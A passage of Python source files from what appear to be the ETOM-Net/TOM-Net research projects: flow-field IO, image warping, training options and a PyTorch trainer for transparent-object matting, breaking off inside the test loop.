{
"source": "1asso/ETOM-Net",
"score": 2
}
#### File: 1asso/ETOM-Net/utility.py
```python
from models.CoarseNet import CreateOutput
import os
import torch
from torch import Tensor
import math
import logging
from torchvision import transforms
from torchvision.utils import save_image
import struct
import torch.nn as nn
import torch.nn.functional as F
from pathlib import Path
from skimage.color import hsv2rgb
from typing import Type, Any, Callable, Union, List, Optional, Dict
TAG = 202021.25
### IO utilities
def load_data(f_name: str) -> dict:
data = {}
if os.path.isfile(f_name):
data = torch.load(f_name)
return data
def resize_tensor(input_tensor: Tensor, h: int, w: int) -> Tensor:
final_output = None
for img in input_tensor:
img_PIL = transforms.ToPILImage()(img)
img_PIL = transforms.Resize([h, w])(img_PIL)
img_PIL = transforms.ToTensor()(img_PIL)
if final_output is None:
final_output = img_PIL
else:
final_output = torch.cat((final_output, img_PIL), 0)
return final_output
def save_compact_results(save_name: str, results: List[Tensor], width_num: int) -> None:
_int = 5
num = len(results)
w_n = width_num or 3
h_n = math.ceil(num / w_n)
idx = 1
big_img = None
fix_h = fix_w = None
h = w = None
for v in results:
        if not isinstance(v, bool):
img = v.float()
if img.dim() > 3 or img.dim() < 2:
logging.error('Dim of image must be 2 or 3')
            if big_img is None:
c, h, w = list(img.size())
fix_h = h
fix_w = w
big_img = torch.Tensor(3, h_n*h + (h_n-1)*_int,
w_n*w + (w_n-1)*_int).fill_(0)
if img.size(0) != 3:
img = img.unsqueeze(0)
img = img.repeat(3, 1, 1)
if img.size(1) != fix_h or img.size(2) != fix_w:
img = resize_tensor(img, fix_h, fix_w)
h_idx = math.floor((idx-1) / w_n) + 1
w_idx = (idx-1) % w_n + 1
h_start = (h_idx-1) * (h+_int)
w_start = (w_idx-1) * (w+_int)
big_img[:, h_start:h_start+h, w_start:w_start+w] = img
idx += 1
path = Path(save_name)
if not os.path.exists(path.parent):
os.makedirs(path.parent)
save_image(big_img, save_name)
### flow utilities
def flow_to_color(flow: Tensor) -> Tensor:
flow = flow.float()
if flow.size(0) == 3:
f_val = flow[2, :, :].ge(0.1).float()
else:
f_val = torch.ones(flow.size(1), flow.size(2)).cuda()
f_du = flow[1, :, :].clone()
f_dv = flow[0, :, :].clone()
f_mag = torch.sqrt(torch.pow(f_du, 2) + torch.pow(f_dv, 2))
f_dir = torch.atan2(f_dv, f_du)
img = flow_mapping(f_mag, f_dir, f_val)
return img
def flow_mapping(f_mag: Tensor, f_dir: Tensor, f_val: Tensor) -> Tensor:
img_size = f_mag.size()
img = torch.zeros(3, img_size[0], img_size[1]).cuda()
img[0, :, :] = (f_dir + math.pi) / (2 * math.pi)
img[1, :, :] = torch.div(f_mag, (f_mag.size(1) * 0.5)).clamp(0, 1)
img[2, :, :] = 1
img[1:2, :, :] = torch.minimum(torch.maximum(img[1:2, :, :], torch.zeros(img_size).cuda()), torch.ones(img_size).cuda())
img = torch.from_numpy(hsv2rgb(img.cpu().permute(1,2,0).detach())).cuda().permute(2,0,1)
img[0, :, :] = img[0, :, :] * f_val
img[1, :, :] = img[1, :, :] * f_val
img[2, :, :] = img[2, :, :] * f_val
return img
def load_flow(filename: str) -> Tensor:
f = open(filename, 'rb')
tag = struct.unpack('f', f.read(4))[0]
assert tag == TAG, 'Unable to read ' + filename + ' because of wrong tag'
w = struct.unpack('i', f.read(4))[0]
h = struct.unpack('i', f.read(4))[0]
channels = 2
l = [] # in file: [h, w, c]
for i, val in enumerate(struct.iter_unpack('h', f.read())):
if not i % 2:
l.append([])
l[int(i/2)].append(val[0])
flow = torch.ShortTensor(l).reshape(h, w, channels)
f.close()
flow = flow.permute(2, 0, 1).float() # output: [c, h, w]
return flow
def save_flow(filename: str, flow: Tensor) -> None:
flow = flow.short().permute(1, 2, 0).clone()
f = open(filename, 'wb')
f.write(struct.pack('f', TAG))
f.write(struct.pack('i', flow.size(1)))
f.write(struct.pack('i', flow.size(0)))
for val in flow.reshape([flow.numel()]).tolist():
f.write(struct.pack('h', val))
f.close()
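# Illustrative round trip for the flow IO pair above (a sketch; 'demo.flo'
# is a hypothetical path, not part of the project):
#
#   flow = torch.zeros(2, 4, 4)  # [c, h, w] with c = 2
#   save_flow('demo.flo', flow)
#   restored = load_flow('demo.flo')
#   assert restored.shape == (2, 4, 4)
#
# Values are packed as 16-bit integers ('h'), so fractional flow components
# are truncated by .short() on save.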
### dict utilities
def build_loss_string(losses: dict) -> str:
total_loss = 0
s = ''
count = 0
for k, v in losses.items():
count += 1
s += f'{k}: {v}'
if not count % 4:
s += '\n'
elif count != 16:
s += ', '
total_loss += v
s += f'[Total Loss: {total_loss}]'
return s
def dicts_add(dict_ori: dict, dict_to_add: dict) -> None:
for k, v in dict_to_add.items():
        if k not in dict_ori:
dict_ori[k] = 0
dict_ori[k] = dict_ori[k] + v
def dict_of_dict_average(dict_of_dict: Dict[str, Dict[str, float]]) -> Dict[str, float]:
result = {}
for k1, v1 in dict_of_dict.items():
for k2, v2 in v1.items():
            if k2 not in result:
result[k2] = 0
result[k2] = result[k2] + v2
n = len(dict_of_dict)
for k, v in result.items():
result[k] /= n
return result
def dict_divide(dict_ori: dict, n: int) -> dict:
return {k: v / n for k, v in dict_ori.items()}
def hist_to_str(d: dict) -> str:
s = ''
for k, v in d.items():
s += f'Epoch: {k}\n{v}\n\n'
return s
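# A minimal usage sketch for the dict helpers above (made-up loss values):
#
#   totals = {}
#   dicts_add(totals, {'flow': 1.0, 'mask': 2.0})
#   dicts_add(totals, {'flow': 3.0, 'mask': 2.0})
#   dict_divide(totals, 2)  # -> {'flow': 2.0, 'mask': 2.0}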
### model utilities
class CreateMultiScaleData(nn.Module):
def __init__(self, ms_num: int) -> None:
super(CreateMultiScaleData, self).__init__()
self.ms_num = ms_num
def forward(self, x: List[Tensor]) -> List[List[Tensor]]:
result = [[],[],[],[],[]]
for i in range(self.ms_num, 0, -1):
scale = 2**(i-1)
result[0].append(nn.AvgPool2d((scale, scale))(x[0]))
result[1].append(nn.AvgPool2d((scale, scale))(x[1]))
result[2].append(nn.AvgPool2d((scale, scale))(x[2]))
result[3].append(nn.MaxPool2d((scale, scale))(x[3]))
result[4].append(nn.AvgPool2d((scale, scale))(x[4]).mul(1/scale))
return result
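# With ms_num = 4 and, say, 512x512 inputs, the loop above appends pooled
# tensors from coarse to fine (scale factors 8, 4, 2, 1, i.e. spatial sizes
# 64, 128, 256, 512). The flow entry (index 4) is additionally scaled by
# 1/scale so that flow magnitudes stay consistent with each resolution.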
class CreateMultiScaleWarping(nn.Module):
def __init__(self, ms_num: int) -> None:
super(CreateMultiScaleWarping, self).__init__()
self.ms_num = ms_num
def forward(self, x: List[List[Tensor]]) -> List[Tensor]:
warping_module = []
for i in range(self.ms_num):
input_0 = x[0][i] # multi_ref_images
input_1 = x[1][i] # flows
single_warping = create_single_warping([input_0, input_1])
warping_module.append(single_warping)
return warping_module
def create_single_warping(input: List[Tensor]) -> Tensor:
ref = input[0]
flo = input[1]
grid = grid_generator(flo)
output = F.grid_sample(ref, grid, align_corners=True)
return output
def grid_generator(flow: Tensor) -> Tensor:
B, C, H, W = flow.size()
# mesh grid
xx = torch.arange(0, W).view(1,-1).repeat(H,1)
yy = torch.arange(0, H).view(-1,1).repeat(1,W)
xx = xx.view(1,1,H,W).repeat(B,1,1,1)
yy = yy.view(1,1,H,W).repeat(B,1,1,1)
grid = torch.cat((xx,yy),1).float().cuda()
flow = flow.div(H/2)
flow_clo = flow.clone()
flow[:,0,:,:] = flow_clo[:,1,:,:]
flow[:,1,:,:] = flow_clo[:,0,:,:]
# scale grid to [-1,1]
grid[:,0,:,:] = 2.0*grid[:,0,:,:].clone() / max(W-1,1)-1.0
grid[:,1,:,:] = 2.0*grid[:,1,:,:].clone() / max(H-1,1)-1.0
grid = grid + flow
grid = grid.permute(0,2,3,1)
return grid
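# Sanity-check sketch for the warping pipeline above (assumes a CUDA device,
# since grid_generator allocates its grid with .cuda()): a zero flow field
# should reproduce the reference image up to interpolation error.
#
#   ref = torch.rand(1, 3, 8, 8).cuda()
#   zero_flow = torch.zeros(1, 2, 8, 8).cuda()
#   out = create_single_warping([ref, zero_flow])
#   assert torch.allclose(out, ref, atol=1e-5)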
### evaluation utilities
class EPELoss(nn.Module):
def __init__(self) -> None:
super(EPELoss, self).__init__()
def forward(self, pred: Tensor, target: Tensor, mask: Tensor, rho: Tensor) -> Tensor:
target = target.narrow(1, 0, 2)
mask = mask.expand_as(target)
pred = pred * mask * rho.gt(0.2) * rho
target = target * mask * rho.gt(0.2) * rho
return torch.norm(target-pred, dim=1).mean()
def get_final_pred(ref_img: Tensor, pred_img: Tensor, pred_mask: Tensor, pred_rho: Tensor) -> Tensor:
final_pred_img = torch.mul(1 - pred_mask, ref_img) + torch.mul(pred_mask, torch.mul(pred_img, pred_rho))
return final_pred_img
def get_mask(masks: Tensor) -> Tensor:
n, c, h, w = list(masks.size())
m = masks.transpose(1, 3).transpose(1,2)
m = m.reshape(int(m.numel()/m.size(3)), m.size(3))
_, pred = m.max(1)
pred = pred.reshape(n, 1, h, w)
return pred
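# get_mask reduces a per-pixel score map to hard labels via an argmax over
# the channel dimension. Shapes only (values made up):
#
#   scores = torch.rand(2, 2, 4, 4)  # [n, c, h, w], c classes
#   labels = get_mask(scores)        # [n, 1, h, w], values in {0, ..., c-1}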
```
{
"source": "1asso/TOM-Net",
"score": 2
}
#### File: TOM-Net/eval/composite.py
```python
from torchvision.utils import save_image
import torch
import glob
import os
import struct
from PIL import Image
import torchvision.transforms.functional as TF
import torch.nn.functional as F
root_dir = ''
def load_flow(filename):
f = open(filename, 'rb')
tag = struct.unpack('f', f.read(4))[0]
w = struct.unpack('i', f.read(4))[0]
h = struct.unpack('i', f.read(4))[0]
channels = 2
l = [] # in file: [h, w, c]
for i, val in enumerate(struct.iter_unpack('h', f.read())):
if not i % 2:
l.append([])
l[int(i/2)].append(val[0])
flow = torch.ShortTensor(l).reshape(h, w, channels)
f.close()
flow = flow.permute(2, 0, 1).float() # output: [c, h, w]
return flow
def create_single_warping(input):
ref = input[0]
flo = input[1]
grid = grid_generator(flo)
output = F.grid_sample(ref, grid, align_corners=True)
return output
def grid_generator(flow):
B, C, H, W = flow.size()
# mesh grid
xx = torch.arange(0, W).view(1,-1).repeat(H,1)
yy = torch.arange(0, H).view(-1,1).repeat(1,W)
xx = xx.view(1,1,H,W).repeat(B,1,1,1)
yy = yy.view(1,1,H,W).repeat(B,1,1,1)
grid = torch.cat((xx,yy),1).float()
flow = 2.0 * flow.div(H)
flow_clo = flow.clone()
flow[:,0,:,:] = flow_clo[:,1,:,:]
flow[:,1,:,:] = flow_clo[:,0,:,:]
# scale grid to [-1,1]
grid[:,0,:,:] = 2.0*grid[:,0,:,:].clone() / max(W-1,1)-1.0
grid[:,1,:,:] = 2.0*grid[:,1,:,:].clone() / max(H-1,1)-1.0
grid = grid + flow
grid = grid.permute(0,2,3,1)
return grid
def get_final_pred(ref_img, pred_img, pred_mask, pred_rho):
final_pred_img = torch.mul(1 - pred_mask, ref_img) + torch.mul(pred_mask, torch.mul(pred_img, pred_rho))
return final_pred_img
bg = glob.glob(os.path.join(root_dir, '*bg.png'))[0]
bg = Image.open(bg)
bg = TF.to_tensor(bg)
mask = glob.glob(os.path.join(root_dir, '*mask.png'))[0]
mask = Image.open(mask)
mask = TF.to_tensor(mask.convert('L'))
mask.apply_(lambda x: 1 if x else 0)
rho = glob.glob(os.path.join(root_dir, '*rho.png'))[0]
rho = Image.open(rho)
rho = TF.to_tensor(rho.convert('L'))
flow = glob.glob(os.path.join(root_dir, '*flow.png'))[0]
flow = load_flow(flow)
pred = create_single_warping([bg.unsqueeze(0), flow.unsqueeze(0)])
final = get_final_pred(bg, pred, mask, rho)
save_image(final, root_dir + 'rec.png')
print('done')
```
#### File: 1asso/TOM-Net/option.py
```python
import os
import argparse
import numpy as np
from typing import Tuple
import torch
import datetime
def get_save_dir_name(args: argparse.Namespace) -> Tuple[str, str]:
now = datetime.datetime.now()
date = now.strftime("%Y-%m-%d")
time = now.strftime("%H:%M:%S")
    d_name = date + '_' + ('RefineNet' if args.refine else 'CoarseNet')
params = ['flow_w', 'mask_w', 'rho_w', 'img_w', 'lr'] if not args.refine else ['r_flow_w', 'r_mask_w', 'lr_r']
for p in params:
d_name = d_name + '_' + p + '-' + str(vars(args)[p])
    d_name = d_name + ('_retrain' if args.retrain is not None else '')
    d_name = d_name + ('_resume' if args.resume is not None else '')
d_name = d_name + ('_valOnly' if args.val_only else '')
log_dir = os.path.join('data/training', d_name, 'logdir')
save = os.path.join('data/training', d_name, 'checkpointdir')
return log_dir, save
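# Example of the resulting name (hypothetical date, default weights, no
# --refine): '2021-01-01_CoarseNet_flow_w-0.1_mask_w-1_rho_w-10_img_w-10_lr-0.0005'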
parser = argparse.ArgumentParser(description='ETOM-Net')
# dataset options
parser.add_argument('--dataset', type=str, default='TOMDataset',
help='dataset name')
parser.add_argument('--data_dir', type=str, default='../TOM-Net_Synth_Train_178k',
help='training dataset path')
parser.add_argument('--train_list', type=str, default='train_60k.txt',
help='train list')
parser.add_argument('--val_list', type=str, default='val_400.txt',
help='val list')
parser.add_argument('--data_aug', type=bool, default=True,
help='data augmentation')
parser.add_argument('--noise', type=float, default=0.05,
help='noise level')
parser.add_argument('--rot_ang', type=float, default=0.3,
help='angle for rotating data')
parser.add_argument('--max_train_num', type=int, default=-1,
help='>0 for max number')
parser.add_argument('--max_val_num', type=int, default=-1,
help='>0 for max number')
# training options
parser.add_argument('--start_epoch', type=int, default=0,
help='set start epoch for restart')
parser.add_argument('--n_epochs', type=int, default=30,
help='number of total epochs to run')
parser.add_argument('--ga', type=int, default=1,
help='gradient accumulations')
parser.add_argument('--batch_size', type=int, default=8,
help='mini-batch size')
parser.add_argument('--lr', type=float, default=0.0005,
help='initial learning rate')
parser.add_argument('--lr_r', type=float, default=0.0002,
help='initial learning rate')
parser.add_argument('--lr_decay_start', type=int, default=5,
help='number of epochs when lr start to decay')
parser.add_argument('--lr_decay_step', type=int, default=5,
help='step for the lr decay')
parser.add_argument('--solver', type=str, default='ADAM',
help='solver used(Adam only)')
parser.add_argument('--beta_1', type=float, default=0.9,
help='first param of Adam optimizer')
parser.add_argument('--beta_2', type=float, default=0.999,
help='second param of Adam optimizer')
# network options
parser.add_argument('--ms_num', type=int, default=4,
help='multiscale level')
parser.add_argument('--refine', action='store_true',
help='train refine net')
parser.add_argument('--pred_dir', type=str, default='coarse.pt',
help='predictor path')
parser.add_argument('--refine_dir', type=str, default='refine.pt',
help='predictor path')
parser.add_argument('--val_only', action='store_true',
help='run on validation set only')
parser.add_argument('--save_images', action='store_true',
help='save test results')
# checkpoint options
parser.add_argument('--resume', type=str, default=None,
help='reload checkpoint and state')
parser.add_argument('--retrain', type=str, default=None,
help='reload checkpoint only')
parser.add_argument('--save_interval', type=int, default=1,
help='epochs to save checkpoint(overwrite)')
parser.add_argument('--save_new', type=int, default=1,
help='epochs to save new checkpoint')
# loss options
parser.add_argument('--flow_w', type=float, default=0.1,
help='flow weight')
parser.add_argument('--img_w', type=int, default=10,
help='image reconstruction weight')
parser.add_argument('--mask_w', type=float, default=1,
help='mask weight')
parser.add_argument('--rho_w', type=int, default=10,
help='attenuation mask weight')
parser.add_argument('--r_flow_w', type=float, default=1,
help='flow weight')
parser.add_argument('--r_mask_w', type=float, default=10,
help='mask weight')
# display options
parser.add_argument('--train_display', type=int, default=20,
help='iteration to display train loss')
parser.add_argument('--train_save', type=int, default=200,
help='iteration to save train results')
parser.add_argument('--val_interval', type=int, default=1,
help='epoch to do validation')
parser.add_argument('--val_display', type=int, default=1,
help='iteration to display val loss')
parser.add_argument('--val_save', type=int, default=1,
help='iteration to save val results')
args = parser.parse_args()
args.batch_size *= torch.cuda.device_count()
if args.refine:
args.batch_size = int(args.batch_size / 2)
print("\n\n --> Let's use", torch.cuda.device_count(), "GPUs!")
args.log_dir, args.save = get_save_dir_name(args)
if not os.path.isdir(args.log_dir):
os.makedirs(args.log_dir)
if not os.path.isdir(args.save):
os.makedirs(args.save)
```
#### File: 1asso/TOM-Net/train.py
```python
import torch
import utility
import logging
import os
import torch.nn as nn
from torch import Tensor
from typing import Type, Any, Callable, Union, List, Optional
from torch.utils.data import DataLoader
from models import CoarseNet, RefineNet
from argparse import Namespace
from checkpoint import CheckPoint
import torch.nn.functional as F
from torch.optim.lr_scheduler import StepLR
from torchvision.utils import save_image
class Trainer:
def __init__(self, model: Union[CoarseNet.CoarseNet, RefineNet.RefineNet],
opt: Namespace, optim_state: Optional[dict]) -> None:
print('\n\n --> Initializing Trainer')
self.opt = opt
self.model = model.cuda()
self.warping_module = self.setup_warping_module()
self.multi_scale_data = self.setup_ms_data_module()
self.optim_state = self.setup_solver(optim_state)
self.setup_criterions()
self.optimizer = torch.optim.Adam(self.model.parameters(), **(self.optim_state), \
weight_decay=0.01)
self.scheduler = StepLR(self.optimizer, step_size=5, gamma=0.5)
print('\n\n --> Total number of parameters in ETOM-Net: ' + str(sum(p.numel() for p in self.model.parameters())))
self.input_image = None
self.ref_images = None
self.tar_images = None
self.rhos = None
self.masks = None
self.flows = None
def setup_ms_data_module(self) -> utility.CreateMultiScaleData:
print('[Multi Scale] Setting up multi scale data module')
ms_data_module = utility.CreateMultiScaleData(self.opt.ms_num)
return ms_data_module
def setup_warping_module(self) -> utility.CreateMultiScaleWarping:
print('[Multi Scale] Setting up multi scale warping')
warping_module = utility.CreateMultiScaleWarping(self.opt.ms_num)
return warping_module
def setup_criterions(self) -> None:
print('\n\n --> Setting up criterion')
print('[Flow Loss] Setting up EPELoss for flow')
self.flow_criterion = utility.EPELoss
print('[Rec Loss] Setting up MSELoss for reconstructed image')
self.rec_criterion = nn.MSELoss
        print('[Mask Loss] Setting up CrossEntropyLoss for mask')
self.mask_criterion = nn.CrossEntropyLoss
print('[Rho Loss] Setting up MSELoss for rho')
self.rho_criterion = nn.MSELoss
def setup_solver(self, in_optim_state: dict) -> dict:
optim_state = None
if self.opt.solver == 'ADAM':
print('[Solver] Using Adam solver')
optim_state = in_optim_state or {
'lr': self.opt.lr_r if self.opt.refine else self.opt.lr,
'betas': (self.opt.beta_1, self.opt.beta_2)
}
else:
logging.warning('Unknown optimization method')
return optim_state
def train(self, epoch: int, dataloader: DataLoader, split: str) -> float:
gradient_accumulations = self.opt.ga
num_batches = len(dataloader)
print('\n====================')
print(self.optim_state)
        print(f'Training epoch #{epoch+1}, {num_batches} mini-batches in total')
print('====================\n')
self.model.train()
loss_iter = {} # loss every n iterations
loss_epoch = {} # loss of the entire epoch
eps = 1e-7
# Zero gradients
self.optimizer.zero_grad()
if self.opt.refine:
loss_iter['mask'] = 0
loss_iter['flow'] = 0
for iter, sample in enumerate(dataloader):
input = self.setup_inputs(sample)
torch.cuda.empty_cache()
torch.autograd.set_detect_anomaly(True)
output = self.model.forward(input)
pred_images = self.single_flow_warping(output) # warp input image with flow
flow_loss = self.opt.r_flow_w * self.flow_criterion()(output[0], self.flows, \
self.masks.unsqueeze(1), self.rhos.unsqueeze(1))
mask_loss = self.opt.r_mask_w * self.mask_criterion()(output[1] + eps, self.masks.squeeze(1).long())
loss = flow_loss + mask_loss
loss_iter['mask'] += mask_loss.item()
loss_iter['flow'] += flow_loss.item()
# Perform a backward pass
(loss / gradient_accumulations).backward()
# Update the weights
if (iter + 1) % gradient_accumulations == 0:
self.optimizer.step()
self.optimizer.zero_grad()
if (iter+1) % self.opt.train_display == 0:
loss_epoch[iter] = self.display(epoch+1, iter+1, num_batches, loss_iter, split)
loss_iter['mask'] = 0
loss_iter['flow'] = 0
if (iter+1) % self.opt.train_save == 0:
self.save_results(epoch+1, iter+1, output, pred_images, split, 0)
else:
for i in range(self.opt.ms_num):
loss_iter[f'Scale {i} mask'] = 0
loss_iter[f'Scale {i} rho'] = 0
loss_iter[f'Scale {i} flow'] = 0
loss_iter[f'Scale {i} rec'] = 0
for iter, sample in enumerate(dataloader):
input = self.setup_inputs(sample)
torch.cuda.empty_cache()
torch.autograd.set_detect_anomaly(True)
output = self.model.forward(input)
pred_images = self.flow_warping(output) # warp input image with flow
loss = None
for i in range(self.opt.ms_num):
mask_loss = self.opt.mask_w * self.mask_criterion()(output[i][1] + eps, \
self.multi_masks[i].squeeze(1).long()) * (1 / 2 ** (self.opt.ms_num - i - 1))
rho_loss = self.opt.rho_w * self.rho_criterion()(output[i][2], \
self.multi_rhos[i]) * (1 / 2 ** (self.opt.ms_num - i - 1))
flow_loss = self.opt.flow_w * self.flow_criterion()(output[i][0], \
self.multi_flows[i], self.multi_masks[i], self.multi_rhos[i]) * (1 / 2 ** (self.opt.ms_num - i - 1))
mask = utility.get_mask(output[i][1]).expand(output[i][1].size(0), \
3, output[i][1].size(2), output[i][1].size(3))
final_pred = utility.get_final_pred(self.multi_ref_images[i], \
pred_images[i], mask, output[i][2])
rec_loss = self.opt.img_w * self.rec_criterion()(final_pred, \
self.multi_tar_images[i]) * (1 / 2 ** (self.opt.ms_num - i - 1))
if i == 0:
loss = mask_loss + rho_loss + flow_loss + rec_loss
else:
loss += mask_loss + rho_loss + flow_loss + rec_loss
loss_iter[f'Scale {i} mask'] += mask_loss.item()
loss_iter[f'Scale {i} rho'] += rho_loss.item()
loss_iter[f'Scale {i} flow'] += flow_loss.item()
loss_iter[f'Scale {i} rec'] += rec_loss.item()
# Perform a backward pass
(loss / gradient_accumulations).backward()
# Update the weights
if (iter + 1) % gradient_accumulations == 0:
self.optimizer.step()
self.optimizer.zero_grad()
if (iter+1) % self.opt.train_display == 0:
loss_epoch[iter] = self.display(epoch+1, iter+1, num_batches, loss_iter, split)
for i in range(self.opt.ms_num):
loss_iter[f'Scale {i} mask'] = 0
loss_iter[f'Scale {i} rho'] = 0
loss_iter[f'Scale {i} flow'] = 0
loss_iter[f'Scale {i} rec'] = 0
if (iter+1) % self.opt.train_save == 0:
self.save_ms_results(epoch+1, iter+1, output, pred_images, split, 0)
average_loss = utility.build_loss_string(utility.dict_of_dict_average(loss_epoch))
print(f'\n\n --> Epoch: [{epoch+1}] Loss summary: \n{average_loss}')
self.scheduler.step()
self.optim_state['lr'] = self.optimizer.param_groups[0]['lr']
return average_loss
def get_saving_name(self, log_dir: str, split: str, epoch: int, iter: int, id: int) -> str:
f_path = f'{log_dir}/{split}/Images/'
f_names = f'epoch:{epoch}_iter:{iter}_id:{id}'
return os.path.join(f_path, f_names + '.png')
def save_images(self, pred_images: Tensor, output: List[Tensor], count: int) -> int:
for i in range(pred_images.size()[0]):
print(count)
os.makedirs(f'results/{count}')
mask = torch.squeeze(utility.get_mask(output[1][i].unsqueeze(0))).expand(3, output[1].size(2), output[1].size(3))
rho = output[2][i].repeat(3, 1, 1)
final_img = utility.get_final_pred(self.ref_images[i], pred_images[i], mask, rho)
save_image(final_img, f'results/{count}/in_rec.png')
save_image(mask.float(), f'results/{count}/mask.png')
save_image(rho, f'results/{count}/rho.png')
utility.save_flow(f'results/{count}/flow.flo', output[0][i])
save_image(self.ref_images[i], f'results/{count}/bg.png')
save_image(self.masks[i], f'results/{count}/mask_gt.png')
save_image(self.rhos[i], f'results/{count}/rho_gt.png')
save_image(self.input_image[i], f'results/{count}/input.png')
save_image(self.tar_images[i], f'results/{count}/tar.png')
utility.save_flow(f'results/{count}/flow_gt.flo', self.flows[i][0:2, :, :])
save_image(utility.flow_to_color(torch.mul(output[0][i], self.masks[i])), f'results/{count}/fcolor.png')
save_image(utility.flow_to_color(self.flows[i]), f'results/{count}/fcolor_gt.png')
count += 1
return count
def get_predicts(self, id: int, output: List[Tensor], pred_img: Tensor, m_scale: int) -> List[Tensor]:
pred = []
        if m_scale is not None:
gt_color_flow = utility.flow_to_color(self.multi_flows[m_scale][id])
else:
gt_color_flow = utility.flow_to_color(self.flows[id])
pred.append(gt_color_flow)
color_flow = utility.flow_to_color(output[0][id])
pred.append(color_flow)
mask = torch.squeeze(utility.get_mask(output[1][id].unsqueeze(0))).expand(3, output[1].size(2), output[1].size(3))
pred.append(mask)
rho = output[2][id].repeat(3, 1, 1)
pred.append(rho)
        if m_scale is not None:
final_img = utility.get_final_pred(self.multi_ref_images[m_scale][id], pred_img[id], mask, rho)
first_img = self.multi_tar_images[m_scale][id]
else:
final_img = utility.get_final_pred(self.ref_images[id], pred_img[id], mask, rho)
first_img = self.tar_images[id]
pred.insert(0, first_img)
pred.insert(1, final_img)
return pred
def get_first_row(self, id: int) -> List[Union[bool, Tensor]]:
first = []
first.append(self.ref_images[id])
first.append(self.tar_images[id])
first.append(False)
first.append(False)
first.append(self.masks[id])
first.append(self.rhos[id])
return first
def save_ms_results(
self,
epoch: int,
iter: int,
output: List[List[Tensor]],
multi_pred_img: List[List[Tensor]],
split: str,
id: int
) -> None:
id = id or 0
scales = self.opt.ms_num
results = []
first_row = self.get_first_row(id)
for val in first_row:
results.append(val)
for i in range(scales-1, -1, -1):
sub_pred = self.get_predicts(id, output[i], multi_pred_img[i], i)
for val in sub_pred:
results.append(val)
save_name = self.get_saving_name(self.opt.log_dir, split, epoch, iter, id)
utility.save_compact_results(save_name, results, 6)
print('\n\n --> Flow magnitude: Max {}, Min {}, Mean {}'.format(
torch.max(output[scales-1][0][id]), torch.min(output[scales-1][0][id]),
torch.mean(torch.abs(output[scales-1][0][id]))))
def save_results(
self,
epoch: int,
iter: int,
output: List[Tensor],
pred_img: Tensor,
split: str,
id: int
) -> None:
id = id or 0
results = []
first_row = self.get_first_row(id)
for val in first_row:
results.append(val)
sub_pred = self.get_predicts(id, output, pred_img, None)
for val in sub_pred:
results.append(val)
save_name = self.get_saving_name(self.opt.log_dir, split, epoch, iter, id)
utility.save_compact_results(save_name, results, 6)
def flow_warping(self, output: List[List[Tensor]]) -> List[Tensor]:
flows = []
for i in range(self.opt.ms_num):
flows.append(output[i][0])
        pred_images = self.warping_module([self.multi_ref_images, flows])
return pred_images
def single_flow_warping(self, output: List[Tensor]) -> Tensor:
        pred_images = utility.create_single_warping([self.ref_images, output[0]])
return pred_images
def test(self, epoch: int, dataloader: DataLoader, split: str) -> float:
num_batches = len(dataloader)
loss_iter = {}
loss_epoch = {}
print(f'\n\n===== Testing after {epoch+1} epochs =====')
self.model.eval()
rec_err = 0
rho_err = 0
flow_err = 0
mask_err = 0
size = 400
def iou(pred, tar):
intersection = torch.logical_and(tar, pred)
union = torch.logical_or(tar, pred)
iou_score = torch.true_divide(torch.sum(intersection), torch.sum(union))
return iou_score
def epe(mask_gt, flow_gt, flow):
mask_gt = mask_gt.expand_as(flow_gt)
flow = flow * mask_gt
flow_gt = flow_gt * mask_gt
return torch.norm(flow_gt-flow, dim=1).mean() / 100
if self.opt.refine:
loss_iter['mask'] = 0
loss_iter['flow'] = 0
count = 1
for iter, sample in enumerate(dataloader):
with torch.no_grad():
input = self.setup_inputs(sample)
torch.cuda.empty_cache()
torch.autograd.set_detect_anomaly(True)
output = self.model.forward(input)
pred_images = self.single_flow_warping(output) # warp input image with flow
if self.opt.save_images:
count = self.save_images(pred_images, output, count)
for i in range(output[0].size(0)):
mask = torch.squeeze(utility.get_mask(output[1][i].unsqueeze(0))).expand(3, \
output[1][i].size(1), output[1][i].size(2))
final_pred = utility.get_final_pred(self.ref_images[i], \
pred_images[i], mask, output[2][i])
rec_err += 100 * F.mse_loss(final_pred, self.tar_images[i])
rho_err += 100 * F.mse_loss(output[2][i], self.rhos[i])
flow_err += epe(self.masks[i], self.flows[i][0:2, :, :] * \
self.rhos[i], output[0][i] * self.rhos[i])
mask_err += iou(mask, self.masks[i])
flow_loss = self.opt.r_flow_w * self.flow_criterion()(output[0], self.flows, \
self.masks.unsqueeze(1), self.rhos.unsqueeze(1))
mask_loss = self.opt.r_mask_w * self.mask_criterion()(output[1], self.masks.squeeze(1).long())
loss_iter['mask'] += mask_loss.item()
loss_iter['flow'] += flow_loss.item()
if (iter+1) % self.opt.val_display == 0:
loss_epoch[iter] = self.display(epoch+1, iter+1, num_batches, loss_iter, split)
loss_iter['mask'] = 0
loss_iter['flow'] = 0
if (iter+1) % self.opt.val_save == 0:
self.save_results(epoch+1, iter+1, output, pred_images, split, 0)
else:
for i in range(self.opt.ms_num):
loss_iter[f'Scale {i} mask'] = 0
loss_iter[f'Scale {i} rho'] = 0
loss_iter[f'Scale {i} flow'] = 0
loss_iter[f'Scale {i} rec'] = 0
count = 1
for iter, sample in enumerate(dataloader):
with torch.no_grad():
torch.cuda.empty_cache()
input = self.setup_inputs(sample)
torch.cuda.empty_cache()
torch.autograd.set_detect_anomaly(True)
output = self.model.forward(input)
pred_images = self.flow_warping(output) # warp input image with flow
if self.opt.save_images:
count = self.save_images(pred_images[-1], output[-1], count)
loss = None
for i in range(output[-1][0].size(0)):
mask = torch.squeeze(utility.get_mask(output[-1][1][i].unsqueeze(0))).expand(3, \
output[-1][1][i].size(1), output[-1][1][i].size(2))
final_pred = utility.get_final_pred(self.multi_ref_images[-1][i], \
pred_images[-1][i], mask, output[-1][2][i])
rec_err += 100 * F.mse_loss(final_pred, self.multi_tar_images[-1][i])
rho_err += 100 * F.mse_loss(output[-1][2][i], self.multi_rhos[-1][i])
flow_err += epe(self.multi_masks[-1][i], self.multi_flows[-1][i][0:2, :, :] * \
self.multi_rhos[-1][i], output[-1][0][i] * self.multi_rhos[-1][i])
mask_err += iou(mask, self.multi_masks[-1][i])
for i in range(self.opt.ms_num):
mask_loss = self.opt.mask_w * self.mask_criterion()(output[i][1], \
self.multi_masks[i].squeeze(1).long()) * (1 / 2 ** (self.opt.ms_num - i - 1))
rho_loss = self.opt.rho_w * self.rho_criterion()(output[i][2], \
self.multi_rhos[i]) * (1 / 2 ** (self.opt.ms_num - i - 1))
flow_loss = self.opt.flow_w * self.flow_criterion()(output[i][0], \
